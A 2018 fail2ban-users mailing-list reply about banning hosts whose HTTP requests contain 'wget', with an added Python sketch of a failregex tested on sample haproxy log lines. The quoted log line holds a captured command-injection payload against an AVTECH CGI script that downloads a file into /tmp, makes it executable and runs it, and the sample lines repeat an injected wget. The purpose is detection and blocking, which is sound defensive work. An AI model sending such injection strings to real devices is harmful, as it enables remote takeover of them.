
List:       fail2ban-users
Subject:    Re: [Fail2ban-users] Ban IPs that try to "wget" in the request
From:       James Moe via Fail2ban-users <fail2ban-users () lists ! sourceforge ! net>
Date:       2018-11-24 21:08:11
Message-ID: 5771c86c-d841-a140-8c48-da5aaa90e841 () sohnen-moe ! com

On 24/11/2018 6.58 AM, Kevin S/Lucas Y wrote:

> I try to ban IPs that try to wget something into my server.
> How am I going to do the failregex?
> For example:
> Nov 20 18:04:28 ubuntu haproxy[12789]: ***********:39636
> [20/Nov/2018:18:04:28.627] http_front http_back/main 286/0/4/25/315 400
> 392 - - ---- 0/0/0/0/0 0/0 "GET
> /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com
> <http://google.com>&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.U \
> ser1.Password%3E$(cd%20/tmp;%20wget%20http://***********/avtechsh%20-O%20d4rk;%20chmod%20777%20d4rk;%20sh%20d4rk)&password=admin
>  HTTP/1.1"
> 
  Without a source IP address for the <HOST>, there is no regex to match
the given text.

-- 
James Moe
moe dot james at sohnen-moe dot com
520.743.3936
Think.
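
The point made in the reply above, as an added example that is not part of the original message: a failregex can only yield a ban when the log line carries a client address for `<HOST>` to capture. The `HOST` pattern is a simplified IPv4-only stand-in for fail2ban's tag, the failregex is a hypothetical sketch, and the log lines are constructed with documentation-range addresses.

```python
import re
from typing import Optional

# Simplified, IPv4-only stand-in for fail2ban's <HOST> tag (assumption: the
# real tag also accepts IPv6 addresses and hostnames).
HOST = r"(?P<host>(?:\d{1,3}\.){3}\d{1,3})"

# Hypothetical failregex in the form a filter file would hold it. It anchors on
# the client address haproxy logs after its PID, then requires "wget" followed
# by an encoded space inside the quoted request line.
FAILREGEX = r'haproxy\[\d+\]: <HOST>:\d+ .*"[A-Z]+ \S*wget(?:%20|\+)\S* HTTP/'

PATTERN = re.compile(FAILREGEX.replace("<HOST>", HOST))

PREFIX = "Nov 20 18:04:28 ubuntu haproxy[12789]: "
MIDDLE = (":39636 [20/Nov/2018:18:04:28.627] http_front http_back/main "
          "286/0/4/25/315 400 392 - - ---- 0/0/0/0/0 0/0 ")

# Constructed sample lines (addresses taken from documentation ranges).
UNMASKED = PREFIX + "203.0.113.7" + MIDDLE + \
    '"GET /cgi-bin/nobody/Search.cgi?username=admin%20;wget%20http://192.0.2.10/x HTTP/1.1"'
# Same line with the client address starred out, as in the quoted question.
MASKED = UNMASKED.replace("203.0.113.7", "***********")
# A request that merely contains the word "wget" in a file name.
BENIGN = PREFIX + "198.51.100.9" + MIDDLE + '"GET /downloads/wget-1.20.tar.gz HTTP/1.1"'


def offending_host(line: str) -> Optional[str]:
    """Return the address to ban, or None when the line does not match."""
    m = PATTERN.search(line)
    return m.group("host") if m else None


if __name__ == "__main__":
    for name, line in (("unmasked", UNMASKED), ("masked", MASKED), ("benign", BENIGN)):
        print(f"{name:9s} -> {offending_host(line)}")
```

A candidate pattern can be checked against a real log file with the `fail2ban-regex` tool before it goes into a filter.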

